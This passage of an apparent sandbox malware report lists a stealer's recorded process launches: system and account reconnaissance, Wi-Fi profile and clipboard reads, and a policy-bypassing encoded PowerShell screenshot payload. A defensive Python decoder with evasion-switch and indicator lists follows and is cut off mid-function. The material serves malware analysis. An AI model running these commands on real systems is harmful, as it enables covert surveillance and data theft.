                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                  Imagebase:0x7ff759970000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

Target ID: 21
Start time: 09:08:40
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "chcp"
Imagebase: 0x7ff7ef160000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 09:08:40
Start date: 18/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe Get-Clipboard
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 09:08:40
Start date: 18/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp
Imagebase: 0x7ff7d9090000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp
Imagebase: 0x7ff7d9090000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Imagebase: 0x7ff7ef160000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Imagebase: 0x7ff7ef160000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\systeminfo.exe
Wow64 process (32bit): false
Commandline: systeminfo
Imagebase: 0x7ff6586f0000
File size: 110'080 bytes
MD5 hash: EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff7ec720000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 09:08:41
Start date: 18/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff605670000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 09:08:42
Start date: 18/12/2024
Path: C:\Windows\System32\HOSTNAME.EXE
Wow64 process (32bit): false
Commandline: hostname
Imagebase: 0x7ff6ebeb0000
File size: 14'848 bytes
MD5 hash: 33AFAA43B84BDEAB12E02F9DBD2B2EE0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:09:08:42
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:09:08:43
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:09:08:43
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:09:08:44
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:query user
                                                                                                                                                                                                                                  Imagebase:0x7ff7dca70000
                                                                                                                                                                                                                                  File size:17'408 bytes
                                                                                                                                                                                                                                  MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7cb260000
                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                  MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:09:08:45
Start date:18/12/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net user guest
Imagebase:0x7ff66c150000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:09:08:45
Start date:18/12/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user guest
Imagebase:0x7ff6474d0000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:09:08:46
Start date:18/12/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net user administrator
Imagebase:0x7ff66c150000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:09:08:46
Start date:18/12/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user administrator
Imagebase:0x7ff6474d0000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:09:08:46
Start date:18/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic startup get caption,command
Imagebase:0x7ff6850e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:09:08:47
Start date:18/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /svc
Imagebase:0x7ff759970000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:09:08:48
Start date:18/12/2024
Path:C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):false
Commandline:ipconfig /all
Imagebase:0x7ff63c480000
File size:35'840 bytes
MD5 hash:62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:09:08:48
Start date:18/12/2024
Path:C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):false
Commandline:route print
Imagebase:0x7ff632250000
File size:24'576 bytes
MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:09:08:49
Start date:18/12/2024
Path:C:\Windows\System32\ARP.EXE
Wow64 process (32bit):false
Commandline:arp -a
Imagebase:0x7ff7fb0a0000
File size:26'624 bytes
MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:09:08:49
Start date:18/12/2024
Path:C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit):false
Commandline:netstat -ano
Imagebase:0x7ff6cf460000
File size:39'936 bytes
MD5 hash:7FDDD6681EA81CE26E64452336F479E6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:sc query type= service state= all
                                                                                                                                                                                                                                  Imagebase:0x7ff7d0b40000
                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show state
                                                                                                                                                                                                                                  Imagebase:0x7ff7ec720000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show config
                                                                                                                                                                                                                                  Imagebase:0x7ff7ec720000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:09:08:55
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                  Start time:09:08:55
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                  Start time:09:08:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                  Start time:09:08:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true
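Target ID 56 is where this listing records the full -EncodedCommand argument (target 55 is the same launch wrapped in cmd.exe /c, with the blob elided above). The option carries base64 over a UTF-16LE script, not encryption, so it decodes offline: the script loads System.Drawing, copies a 1920x1080 region of the desktop with Graphics.CopyFromScreen, and writes screenshot.png to the working directory, which is the screen-capture step of this stealer. The Python below is an added example for this page, not code from Joe Sandbox or from the sample. It takes a recorded command line, recovers the script, and flags what the "Encrypted powershell cmdline option found" and "Bypasses PowerShell execution policy" signatures key on. The switch table (modelled on the abbreviations the Windows PowerShell host accepts), the indicator keyword list and the Triage type are this example's own choices; the sample command line is the one from the record above.

```python
"""Decode and triage a PowerShell -EncodedCommand launch line.

Added example for this report page (not Joe Sandbox or sample code). The
switch-abbreviation table and the indicator keywords are this example's own
choices, not a published standard.
"""
import base64
import binascii
from dataclasses import dataclass, field
from typing import List, Optional

# Command line recorded for target ID 56 in the report, copied verbatim.
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA"
)

# (canonical switch, shortest abbreviation the PowerShell host accepts). The
# host resolves switches by prefix, so "-e", "-ep", "-nop" and "-w hidden" are
# all valid spellings an attacker can use to dodge naive string matching.
SWITCHES = [
    ("encodedcommand", "e"),
    ("executionpolicy", "ex"),
    ("ep", "ep"),              # second alias the host accepts for ExecutionPolicy
    ("noprofile", "nop"),
    ("noninteractive", "noni"),
    ("windowstyle", "w"),
]

# Substrings worth flagging in the decoded script (matched case-insensitively,
# as PowerShell itself is). Chosen for this example; extend to taste.
SCRIPT_INDICATORS = [
    ("CopyFromScreen", "screen capture via System.Drawing"),
    ("System.Drawing", "GDI+ imaging assembly loaded"),
    ("Net.WebClient", "HTTP download client"),
    ("DownloadString", "download-and-run pattern"),
    ("Invoke-Expression", "dynamic code evaluation"),
    ("FromBase64String", "nested encoded payload"),
]


@dataclass
class Triage:
    switches: List[str] = field(default_factory=list)   # suspicious host switches seen
    script: Optional[str] = None                         # decoded -EncodedCommand, if any
    indicators: List[str] = field(default_factory=list) # keywords hit inside the script


def canonical_switch(token: str) -> Optional[str]:
    """Map '-Enc', '-e', '/ep', ... to the full switch name, or None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    name = token[1:].lower()
    for full, shortest in SWITCHES:
        if full.startswith(name) and len(name) >= len(shortest):
            return "executionpolicy" if full == "ep" else full
    return None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; tolerate stripped '=' padding."""
    blob = blob.strip("\"'")
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not base64: {exc}") from exc
    if len(raw) % 2:
        raise ValueError("odd byte count: not a UTF-16LE script")
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of the above, i.e. what the dropper did to build the blob."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage_cmdline(cmdline: str) -> Triage:
    """Walk the tokens, decode any encoded command, collect findings."""
    tokens = [t.strip("\"'") for t in cmdline.split()]   # base64 never contains spaces
    result = Triage()
    i = 0
    while i < len(tokens):
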